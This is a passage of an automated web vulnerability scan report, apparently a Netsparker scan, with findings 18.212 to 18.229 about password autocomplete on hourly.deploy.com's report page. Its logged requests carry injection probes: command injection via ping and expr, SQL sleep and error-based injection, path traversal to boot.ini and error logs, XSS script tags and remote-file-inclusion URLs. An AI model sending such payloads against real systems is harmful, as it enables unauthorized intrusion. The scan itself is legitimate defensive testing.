       <form name="form1" action="/hmc/report/index.cfm?register=1%20ns=netsparker(0x000026)%20" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.212. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%26%20SET%20%2FA+0xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%26%20SET%20%2FA+0xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.213. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.214. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=http://netsparker.com/n? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=http://netsparker.com/n?" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.215. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.216. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../boot.ini%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../boot.ini%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.217. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%26%20ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.218. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.219. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%26ping%20-c%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%26ping%20-c%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.220. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=expr%20268409241%20-%202%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=expr%20268409241%20-%202%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.221. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%26%20ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.222. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000004)%3C/script%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt='%22--%3e%3c/style%3e%3c/script%3e%3cscript%3enetsparker(0x000004)%3c/script%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.223. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%3c%3f+print(int)0xFFF9999-22%3b%2f%2f%3f%3e HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%3c%3f+print(int)0xFFF9999-22%3b%2f%2f%3f%3e" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.224. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27%26ping%20-c%2026%20127.0.0.1%20%26%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%26ping%20-c%2026%20127.0.0.1%20%26%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.225. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt='%3E%3Cnet%20sparker=netsparker(0x00001B)%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt='%3e%3cnet%20sparker=netsparker(0x00001b)%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.226. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error_log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error_log" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.227. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%22%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%22" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.228. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27%22%20ns=%20netsparker(0x00001E)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%22%20ns=%20netsparker(0x00001E)%20" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.229. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=http://netsparker.com/n?%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
